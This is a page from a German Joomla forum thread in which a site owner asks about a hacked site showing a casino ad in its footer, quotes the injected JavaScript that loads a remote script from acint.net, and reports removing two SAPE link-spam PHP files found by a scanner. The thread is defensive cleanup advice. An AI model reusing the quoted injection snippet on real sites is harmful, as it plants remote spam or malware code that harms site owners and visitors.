+ Antworten
Seite 2 von 2 ErsteErste 1 2
Ergebnis 11 bis 18 von 18

Thema: Fremde Anzeige im footer-Bereich ("Book of ra Kostenlos")

  1. #11
    Wohnt hier Avatar von JoomlaWunder
    Registriert seit
    03.03.2010
    Ort
    Nordseeküste
    Beiträge
    4.925
    Bedankte sich
    201
    Erhielt 1.255 Danksagungen
    in 1.222 Beiträgen

    Standard

    Ein zusätzlicher Backend-Schutz sollte für jeder Seite angelegt sein, die auf einem Webserver liegt (lokal natürlich nicht).
    Ein zusätzlicher Schutz im Joomla-Root (also für Backend und Frontend) sollte bei jeder gehackten Seite sofort realisiert werden.

    Ob dein Backup hackfrei ist, kann dir aus der Ferne niemand beantworten.
    Hinweise auf gehackte Dateien können beispielsweise die Zeitstempel der Dateien auf dem Webserver liefern. Ebenso lassen sich Dateien vergleichen und so Änderungen ausfindig machen. Prinzipiell können auch Bilder, PDF .... usw. sowie die DB-Tabellen Schadcode enthalten. Das Ganze ist also nicht ganz trivial. Auf der anderen Seite gab es auch schon Hacks, wo immer 2 bis 3 bestimmte Dateien betroffen waren und man mit dem Löschen bzw. Austauschen dieser Dateien bereits den Hack beseitigen konnte.
    Geändert von JoomlaWunder (12.06.2019 um 12:21 Uhr)
    Gruß!
    JoomlaWunder
    Kein Support per PN!
    Konnte ich helfen? -> Dann bitte den "Danke"-Button klicken!

  2. Erhielt Danksagungen von:


  3. #12
    War schon öfter hier Avatar von lemur
    Registriert seit
    15.07.2008
    Beiträge
    162
    Bedankte sich
    32
    Erhielt 5 Danksagungen
    in 4 Beiträgen

    Standard

    Zitat Zitat von faro02 Beitrag anzeigen
    Um das jedoch genau festzustellen, muss sich ein Profi für Webseitenbereinigung die komplette Installation genau ansehen.
    Danke.
    Gibt es hier solche Profies auf dem Forum?
    Was würde so eine Arbeit kosten?
    Schreiben sie bitte darüber (wenn nicht direckt ins Thema) in Private Nachrichten.
    geschichte-chronologie.de

  4. #13
    War schon öfter hier Avatar von lemur
    Registriert seit
    15.07.2008
    Beiträge
    162
    Bedankte sich
    32
    Erhielt 5 Danksagungen
    in 4 Beiträgen

    Standard

    Hallo,

    ich habe den einzigen Unterschied zwieschen Quellcode der gehackten (in offline) und der "ge-backup-ten" Webseiten gefunden.
    In gehackten gibt es noch die Zeilen:

    <!--
    var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="//www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})()
    //-->
    </script>
    Kann man damit diese versteckte funktion in php-Code finden und entfernen bitte?
    geschichte-chronologie.de

  5. #14
    Wohnt hier Avatar von gottypower
    Registriert seit
    19.11.2005
    Ort
    im Core
    Alter
    54
    Beiträge
    2.090
    Bedankte sich
    63
    Erhielt 626 Danksagungen
    in 589 Beiträgen

    Standard

    Könnte man bestimmt... Wichtig wäre halt auch das Tor zu finden wie der Schadcode in die Installation gelangt ist und dieses sofort schlissen, sonst ist die ganze Arbeit umsonst.

    Wie schon meine Vorredner geschrieben haben, solltes du dir professionelle Hilfe einkaufen. Falls sich aktuell noch keine bei dir gemeldet hat, kannst du auch mich gerne per PN anschreiben.
    Einfach kann jeder...

    und immer schön danke sagen

  6. #15
    War schon öfter hier Avatar von lemur
    Registriert seit
    15.07.2008
    Beiträge
    162
    Bedankte sich
    32
    Erhielt 5 Danksagungen
    in 4 Beiträgen

    Standard

    Gelöst!!!

    Ich habe den Virus mit dem AI-BOLIT Scanner Skript für Windows 7,8,10 entfernt.

    Die Arbeit war (abgesehen von Suchen und Versuchen) nicht sehr schwierig.

    1) die Website lokal (auf dem Wampserver) installieren.
    2) weiter ging es nach den Anweisungen von AI-BOLIT:
    2.1) Skript AI-BOLIT für Windows 7,8,10 herunterladen
    2.2) die Dateien der Website aus dem Ordner von Wampserver in den Ordner /site von AI-BOLIT kopieren
    2.3) die Datei start.bat starten.
    2.4) den Bericht prüfen.

    3) der Bericht hat 2 verdächtige Dateien angegeben.
    Z:\aibolit\aibolit-for-windows\site/templates/system/data/ML_lcode.php
    [x] 1…return$this->raise_error('<ml_update_settings_set_param>'.var_ export($result,true).'</ml_update_settings_set_param>');}} if(isset($_COOKIE['clear_cache'])&&$this->ML_bot){$this->tm_links_db_file=dirname(__FILE__).'/'.$this->tm_host..$this->

    Z:\aibolit\aibolit-for-windows\site/templates/system/template.php
    [x] 1…'multi_site']==true){$this->_multi_site=true;}if(isset($options['debug'])&&$options['debug']==true){$this->_debug=true;} if(isset($_COOKIE['sape_cookie'])&&($_COOKIE['sape_cookie']==_SAPE_USER)){$this->_is_our_bot=true;if(isset($_COOKIE['sa
    4) ich habe diese Dateien in einer sauberen Version von Joomla überprüft - es gab keine da, auch keinen /data Ordner.
    Im Ordner /data gab es eine weitere Datei
    5) auf dem Server habe ich den Ordner /data und die Dateil geöscht. ...
    6) Auf meinem Computer löschte ich die Cookies.

    Alles! Der fremde Code verschwand, hoffentlich für immer.

    Schlüsselwörter für das Virus: acint.net/aci.js, SAPE

    Danke an alle.

    ........

    Bemerkung. Scanner ReScan.pro hat keine Sicherheitsprobleme mit der Website identifiziert.
    geschichte-chronologie.de

  7. #16
    Gute Seele des Boards Avatar von NinjaTurtle
    Registriert seit
    24.11.2012
    Ort
    Willich
    Alter
    53
    Beiträge
    17.540
    Bedankte sich
    647
    Erhielt 4.531 Danksagungen
    in 4.314 Beiträgen

    Standard

    Es geht dabei darum die Lücke zu finden und die findest Du so nicht.
    Deine Besucher sind bald wieder im Haus.

    Neue Webseite mit Joomla - Relaunch einer Joomla-Seite - Umzug?
    Erstellung, Betreuung, Backups, Updates und Hosting - Monatliche Zahlweise!
    WebMonkeyDesign


  8. #17
    Gehört zum Inventar Avatar von Re:Later
    Registriert seit
    21.04.2014
    Ort
    Berlin
    Beiträge
    5.779
    Bedankte sich
    155
    Erhielt 2.246 Danksagungen
    in 2.014 Beiträgen

    Standard

    Immer die selbe Antwort:
    - Gäbe es einen Scanner, der verlässlich Ursachen *und* Symptome findet, hätten wir ihn alle.
    - Es nützt doch nichts, nur den Code zu entfernen, den du offensichtlich siehst. Du musst auch den finden, der es überhaupt möglich gemacht hat, dass weiterer Code/Dateien in dein Joomla eingeschleust wurde. Und die haben ggf. weitere Codes eingeschleust, die weitere eingeschleust haben...
    - Eine Datei, die zusätzlich da ist, hast nat. recht, ist meist eine eingeschleuste, aber was ist mit denen, die auf beiden Seiten da sind und die "nur" verändert wurden?

    Hast keine 50:50-Chance, dass das damit erledigt ist, aber wünsch dir natürlich, dass das reicht. Erfahrung sagt mir, nein.
    Joomlafachmann: https://www.ghsvs.de

  9. #18
    Hat hier eine Zweitwohnung Avatar von Sieger66
    Registriert seit
    23.05.2010
    Beiträge
    1.823
    Bedankte sich
    14
    Erhielt 480 Danksagungen
    in 451 Beiträgen
    Geändert von Sieger66 (Gestern um 09:08 Uhr)
    Gelöstes Problem bitte so markieren http://www.joomlaportal.de/forenrege...tel-ndern.html
    Fragen und Antworten zu Joomla in den Joomla FAQ
    - Danke für den Klick auf Danke

  10. Erhielt Danksagungen von:


+ Antworten
Seite 2 von 2 ErsteErste 1 2

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein